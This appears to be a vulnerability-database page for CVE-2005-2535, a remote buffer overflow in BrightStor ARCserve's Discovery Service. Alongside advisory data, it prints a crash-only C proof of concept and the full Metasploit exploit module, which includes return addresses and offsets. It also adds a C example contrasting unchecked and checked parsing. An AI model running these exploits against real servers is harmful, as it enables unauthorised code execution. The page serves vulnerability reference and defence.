CVE-2005-2535
CVSS 7.5
Published: 2005-08-10 00:00:00
Last revised: 2008-09-05 16:52:01

[Original text] Buffer overflow in the Discovery Service in BrightStor ARCserve Backup 9.0 through 11.1 allows remote attackers to execute arbitrary commands via a large packet to TCP port 41523, a different vulnerability than CVE-2005-0260.


[CNNVD] CA BrightStor ARCserve/Enterprise buffer overflow vulnerability (CNNVD-200508-098)

        Computer Associates BrightStor ARCserve/Enterprise is a multi-platform backup and recovery protection system.
        A buffer overflow exists in the Computer Associates BrightStor ARCserve Backup Discovery Service. The service accepts unauthenticated connections on TCP port 41523 and, when handling a request, copies the data received from the network into a fixed-size buffer without checking its length. A remote attacker who sends an over-long request can overflow that buffer and potentially execute arbitrary code with the privileges of the service process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:ca:brightstor_arcserve_backup:11.1::windows
cpe:/a:ca:brightstor_enterprise_backup:10.5::aix
cpe:/a:ca:brightstor_arcserve_backup:11.1::aix
cpe:/a:ca:brightstor_arcserve_backup:7.0::linux
cpe:/a:ca:brightstor_enterprise_backup:10.0  (Computer Associates BrightStor Enterprise Backup 10.0)
cpe:/a:ca:brightstor_enterprise_backup:10.0::aix
cpe:/a:ca:brightstor_arcserve_backup:11.1::solaris
cpe:/a:ca:brightstor_arcserve_backup:9.0.1::windows
cpe:/a:ca:brightstor_arcserve_backup:11.1::netware
cpe:/a:ca:brightstor_arcserve_backup:11.0::windows
cpe:/a:ca:brightstor_arcserve_backup_hp:11.1::hp
cpe:/a:ca:brightstor_arcserve_backup:9.0::linux:jp
cpe:/a:ca:brightstor_enterprise_backup:10.5::windows
cpe:/a:ca:brightstor_enterprise_backup:10.5::hp
cpe:/a:ca:brightstor_arcserve_backup:11.1::tru64
cpe:/a:ca:brightstor_enterprise_backup:10.5::tru64
cpe:/a:ca:brightstor_enterprise_backup:10::solaris
cpe:/a:ca:arcserve_backup_2000:::windows:jp
cpe:/a:ca:brightstor_arcserve_backup:9.0::netware
cpe:/a:ca:brightstor_enterprise_backup:10.0::mainframe_linux
cpe:/a:ca:brightstor_arcserve_backup:9.0::linux
cpe:/a:ca:brightstor_enterprise_backup:10.5  (Computer Associates BrightStor Enterprise Backup 10.5)
cpe:/a:ca:brightstor_arcserve_backup:11.1::macintosh
cpe:/a:ca:brightstor_enterprise_backup:10.5::solaris
cpe:/a:ca:brightstor_arcserve_backup:11.1::linux
cpe:/a:ca:brightstor_enterprise_backup:10.0::hpux

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2535
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2535
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-098
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/966880
(PATCH)  CERT-VN  VU#966880
http://xforce.iss.net/xforce/xfdb/19320
(PATCH)  XF  brightstor-discovery-servicepc-bo(19320)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478
(PATCH)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=32478
http://www.securityfocus.com/bid/12536
(PATCH)  BID  12536
http://secunia.com/advisories/14293
(VENDOR_ADVISORY)  SECUNIA  14293
http://www.osvdb.org/13814
(UNKNOWN)  OSVDB  13814
http://archives.neohapsis.com/archives/bugtraq/2005-02/0201.html
(UNKNOWN)  BUGTRAQ  20050215 Re: BrightStor ARCserve Backup buffer overflow PoC
http://archives.neohapsis.com/archives/bugtraq/2005-02/0141.html
(UNKNOWN)  BUGTRAQ  20050211 Re: BrightStor ARCserve Backup buffer overflow PoC
http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html
(UNKNOWN)  BUGTRAQ  20050211 BrightStor ARCserve Backup buffer overflow PoC

- Vulnerability information

CA BrightStor ARCserve/Enterprise buffer overflow vulnerability
Severity: High    Type: Buffer overflow
2005-08-10 00:00:00 2005-10-25 00:00:00
Remote
        (Description as given above under the CNNVD entry.)

- Advisories and patches

        No data available. The vendor's own fix reference is the CA Security Advisor entry (vuln.aspx?ID=32478) listed under other links above.

- Vulnerability information (815)

CA BrightStor ARCserve Backup Remote Buffer Overflow PoC (EDBID:815)
Platform: linux    Type: dos
2005-02-12 Verified
Author: cybertronic
/*
 * BrightStor ARCserve Backup buffer overflow PoC
 * cybertronic@gmx.net
 *
 * Sends one Discovery Service request to TCP port 41523 in which the bytes
 * that land on the saved EBP and EIP are set to marker values (0xdeadbabe
 * and 0xdeadc0de); a crash showing those values confirms the overflow.
 * Crash-only PoC (listed on Exploit-DB as a Linux DoS), no payload.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* ANSI colour escapes ("\033" is the portable spelling of ESC) */
#define RED "\033[31m\033[1m"
#define GREEN "\033[32m\033[1m"
#define YELLOW "\033[33m\033[1m"
#define BLUE "\033[34m\033[1m"
#define NORMAL "\033[m"

#define PORT 41523

void
start ( int s )
{
        char buffer[4096];

        bzero ( buffer, sizeof ( buffer ) );
        memset ( buffer, 0x41, 50 );    /* 'A' filler; the fields below are patched over it */
        buffer[0] = 0x9b;               /* request type byte */
        buffer[1] = 0x53; //S           /* first host-name field: "SERVICEPC" */
        buffer[2] = 0x45; //E
        buffer[3] = 0x52; //R
        buffer[4] = 0x56; //V
        buffer[5] = 0x49; //I
        buffer[6] = 0x43; //C
        buffer[7] = 0x45; //E
        buffer[8] = 0x50; //P
        buffer[9] = 0x43; //C
        buffer[17] = 0x18;
        buffer[21] = 0xc0;              /* client IP field: 192.168.2.103 (arbitrary) */
        buffer[22] = 0xa8;
        buffer[23] = 0x02;
        buffer[24] = 0x67;
        buffer[25] = 0x53; //S          /* second host-name field: "SERVICEPC" */
        buffer[26] = 0x45; //E
        buffer[27] = 0x52; //R
        buffer[28] = 0x56; //V
        buffer[29] = 0x49; //I
        buffer[30] = 0x43; //C
        buffer[31] = 0x45; //E
        buffer[32] = 0x50; //P
        buffer[33] = 0x43; //C
        buffer[41] = 0x01;              /* trailer bytes as captured from a real client */
        buffer[43] = 0x0c;
        buffer[44] = 0x6c;
        buffer[45] = 0x93;
        buffer[46] = 0xce;
        buffer[47] = 0x18;
        buffer[48] = 0x18;
        //ebp (0xdeadbabe, little-endian)
        buffer[49] = 0xbe;
        buffer[50] = 0xba;
        buffer[51] = 0xad;
        buffer[52] = 0xde;
        //eip (0xdeadc0de, little-endian)
        buffer[53] = 0xde;
        buffer[54] = 0xc0;
        buffer[55] = 0xad;
        buffer[56] = 0xde;

        /* strlen() stops at the first zero byte, so exactly 57 bytes go on the wire */
        printf ( "[*] Sending buffer [ %zu bytes ]...", strlen ( buffer ) );
        if ( write ( s, buffer, strlen ( buffer ) ) <= 0 )
        {
                printf ( RED "Send failed!\n" NORMAL );
                exit ( 1 );
        }
        printf ( GREEN "OK!\n" NORMAL );
        sleep ( 1 );
}

int
main ( int argc, char *argv[] )
{

        int s;
        struct hostent *he;
        struct sockaddr_in addr;

        if ( argc != 2 )
        {
                fprintf ( stderr,"Usage: %s hostname\n", argv[0] );
                exit ( 1 );
        }

        printf ( "Resolving hostname..." );
        if ( ( he = gethostbyname ( argv[1] ) ) == NULL )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( "OK!\n" );

        if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
        {
                exit ( 1 );
        }

        memset ( &addr, 0, sizeof ( addr ) );
        addr.sin_family = AF_INET;
        addr.sin_port = htons ( PORT );
        addr.sin_addr = *( ( struct in_addr * ) he->h_addr );

        printf ( "Connecting to %s...", argv[1] );
        if ( connect ( s, ( struct sockaddr * ) &addr, sizeof ( struct sockaddr ) ) == -1 )
        {
                printf ( RED "FAILED!\n" NORMAL );
                exit ( 1 );
        }
        printf ( "OK!\n" );
        start ( s );
        close ( s );
        return ( 0 );
}

// milw0rm.com [2005-02-12]

- Vulnerability information (16408)

CA BrightStor Discovery Service TCP Overflow (EDBID:16408)
Platform: windows    Type: remote
2010-04-30 Verified
Author: metasploit
##
# $Id: discovery_tcp.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA BrightStor Discovery Service TCP Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the CA BrightStor
				Discovery Service. This vulnerability occurs when a specific
				type of request is sent to the TCP listener on port 41523.
				This vulnerability was discovered by cybertronic[at]gmx.net
				and affects all known versions of the BrightStor product.
				This module is based on the 'cabrightstor_disco' exploit by
				Thor Doomen.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-2535'],
					[ 'OSVDB', '13814'],
					[ 'BID', '12536'],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
					[ 'URL', 'http://milw0rm.com/exploits/1131'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0
						{
							'Platform' => 'win',
							'Ret'      => 0x23803b20, # pop/pop/ret
							'Offset'   => 1032,
						},
					],
					[
						'cheyprod.dll 12/12/2003',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805714, # pop/pop/ret
							'Offset'   => 1024,
						},
					],
					[
						'cheyprod.dll 07/21/2004',
						{
							'Platform' => 'win',
							'Ret'      => 0x23805d10, # pop/pop/ret
							'Offset'   => 1024,
						},
					],
				],
			'DisclosureDate' => 'Feb 14 2005',
			'DefaultTarget' => 1))

		register_options(
			[
				Opt::RPORT(41523)
			], self.class)
	end

	def check

		# The first request should have no reply
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('META')
		x = csock.get_once(-1, 3)
		csock.close

		# The second request should be replied with the host name
		csock = Rex::Socket::Tcp.create(
			'PeerHost'  => datastore['RHOST'],
			'PeerPort'  => datastore['RPORT'],
			'Context'   =>
				{
					'Msf'        => framework,
					'MsfExploit' => self,
				})

		csock.put('hMETA')
		y = csock.get_once(-1, 3)
		csock.close

		if (y and not x)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(4096)

		# Overwriting the return address works well, but the only register
		# pointing back to our code is 'esp'. The following stub overwrites
		# the SEH frame instead, making things a bit easier.

		seh = generate_seh_payload(target.ret)
		buf[target['Offset'], seh.length] = seh

		# Make sure the return address is invalid to trigger SEH
		buf[ 900, 100]     = (rand(127)+128).chr * 100

		# SERVICEPC is the client host name actually =P (thanks Juliano!)
		req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"
		req << buf

		sock.put(req)
		sock.get_once

		handler
		disconnect
	end

end
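The request layout in the module's `req` string (and the byte-by-byte patching in the cybertronic PoC under EDB-ID 815, which pads the same fields out differently, so the exact field widths are not settled by this page) is easier to reason about as code. What follows is an added example, not code from either exploit or from CA: it builds a frame in the layout the Metasploit module sends, places the unchecked copy that the advisory describes next to a length-checked parser, and is in C because the bug is a native stack overflow. Assumptions, also flagged in comments: the 1024-byte receive buffer is inferred from the module's 'Offset' => 1024 targets rather than read from cheyprod.dll, the field names (host name, client IP, trailer) follow the module's comments, and all helper names are this example's own.

```c
/*
 * Added example (not from the PoC, the Metasploit module, or CA).
 * Frame layout, as the Metasploit module sends it:
 *   0x9b | host[9] | 0x18 | client_ip[4] | host[9] | 8 trailer bytes | body
 * ASSUMPTION: the service copies the body into a ~1024-byte stack buffer
 * (inferred from 'Offset' => 1024 in the module); the real parser is unknown.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DISCO_PORT        41523
#define DISCO_HOST_LEN    9                          /* "SERVICEPC" */
#define DISCO_HDR_LEN     (1 + DISCO_HOST_LEN + 1 + 4 + DISCO_HOST_LEN + 8)
#define ASSUMED_STACK_BUF 1024                       /* assumption, see above */

typedef struct {
    char     host[DISCO_HOST_LEN + 1];
    uint32_t client_ip;
    size_t   body_len;
} disco_req_t;

/* Serialise a request. Returns bytes written, or 0 if out is too small
 * or host is not exactly DISCO_HOST_LEN characters. */
size_t disco_build_request(uint8_t *out, size_t out_len,
                           const char *host, uint32_t client_ip,
                           const uint8_t *body, size_t body_len)
{
    static const uint8_t trailer[8] = { 0x01, 0x0c, 0x6c, 0x93, 0xce, 0x18, 0x18, 0x41 };
    size_t need = DISCO_HDR_LEN + body_len;
    uint8_t *p = out;

    if (out_len < need || strlen(host) != DISCO_HOST_LEN)
        return 0;
    *p++ = 0x9b;
    memcpy(p, host, DISCO_HOST_LEN);    p += DISCO_HOST_LEN;
    *p++ = 0x18;
    *p++ = (uint8_t)(client_ip >> 24);  /* big-endian, like pack('N') in the module */
    *p++ = (uint8_t)(client_ip >> 16);
    *p++ = (uint8_t)(client_ip >> 8);
    *p++ = (uint8_t)client_ip;
    memcpy(p, host, DISCO_HOST_LEN);    p += DISCO_HOST_LEN;
    memcpy(p, trailer, sizeof trailer); p += sizeof trailer;
    memcpy(p, body, body_len);
    return need;
}

/* Model of the flaw: the attacker-controlled length drives a copy into a
 * fixed stack buffer. Shown for contrast only; with a body longer than
 * ASSUMED_STACK_BUF this smashes the stack. Returns bytes copied. */
int disco_handle_unsafe(const uint8_t *pkt, size_t pkt_len)
{
    char buf[ASSUMED_STACK_BUF];
    if (pkt_len < DISCO_HDR_LEN)
        return -1;
    memcpy(buf, pkt + DISCO_HDR_LEN, pkt_len - DISCO_HDR_LEN);   /* no bound check */
    return (int)(pkt_len - DISCO_HDR_LEN);
}

/* Length-checked parser. 0 = ok, -1 = short or malformed frame,
 * -2 = body larger than the handler's buffer (rejected, never copied). */
int disco_parse_checked(const uint8_t *pkt, size_t pkt_len, disco_req_t *out)
{
    const uint8_t *ip;
    size_t body_len;

    if (pkt_len < DISCO_HDR_LEN || pkt[0] != 0x9b || pkt[1 + DISCO_HOST_LEN] != 0x18)
        return -1;
    body_len = pkt_len - DISCO_HDR_LEN;
    if (body_len > ASSUMED_STACK_BUF)
        return -2;
    memcpy(out->host, pkt + 1, DISCO_HOST_LEN);
    out->host[DISCO_HOST_LEN] = '\0';
    ip = pkt + 1 + DISCO_HOST_LEN + 1;
    out->client_ip = ((uint32_t)ip[0] << 24) | ((uint32_t)ip[1] << 16) |
                     ((uint32_t)ip[2] << 8)  |  (uint32_t)ip[3];
    out->body_len = body_len;
    return 0;
}

int main(void)
{
    uint8_t body[4096];                       /* constructed input, same size as the module's buf */
    uint8_t pkt[DISCO_HDR_LEN + sizeof body];
    disco_req_t req;
    size_t n;
    int rc;

    memset(body, 'A', sizeof body);
    n = disco_build_request(pkt, sizeof pkt, "SERVICEPC", 0x01020304u, body, sizeof body);
    rc = disco_parse_checked(pkt, n, &req);
    printf("%zu-byte request to tcp/%d: checked parser returns %d\n", n, DISCO_PORT, rc);
    return rc == -2 ? 0 : 1;
}
```

The -2 result from the checked parser is also the signal a network sensor would key on for port 41523: a 0x9b frame carrying a multi-kilobyte body is, for this service, the attack itself rather than a legitimate discovery request. The checked parser only shows what the missing length validation looks like; the fix for deployed systems is the vendor patch.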
		

- Vulnerability information (F83210)

CA BrightStor Discovery Service TCP Overflow (PacketStormID:F83210)
2009-11-26 00:00:00
H D Moore, patrick  metasploit.com
exploit,tcp
CVE-2005-2535

This Metasploit module exploits a vulnerability in the CA BrightStor Discovery Service. This vulnerability occurs when a specific type of request is sent to the TCP listener on port 41523. This vulnerability was discovered by cybertronic@gmx.net and affects all known versions of the BrightStor product. This Metasploit module is based on the 'cabrightstor_disco' exploit by Thor Doomen.
The module source carried by this entry is the same discovery_tcp.rb listed under EDB-ID 16408 above.


- Vulnerability information

OSVDB 13814
CA BrightStor ARCserve Backup Discovery Service SERVICEPC Remote Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Solution: Patch / RCS
Exploit: Public, Commercial
Disclosure: Vendor Verified, Uncoordinated Disclosure

- Vulnerability description

A buffer overflow exists in ARCserve Backup. The Discovery Service fails to validate packets received on TCP port 41523 resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-02-12 Unknown
2005-02-12 2005-02-19

- Solution

Upgrade to version r11.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Note that the CVE description above lists 9.0 through 11.1 as affected and the CPE list includes 11.1, so treat the CA advisory (vuln.aspx?ID=32478, under other links) as the authoritative reference for the fixed build rather than the bare version number. Until the fix is applied, restrict network access to the unauthenticated listener on TCP port 41523.

- References

- Vulnerability author

About SCAP中文社区

SCAP中文社区 (SCAP Chinese Community) is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of MITRE Corporation; their official data sources are maintained on MITRE's websites.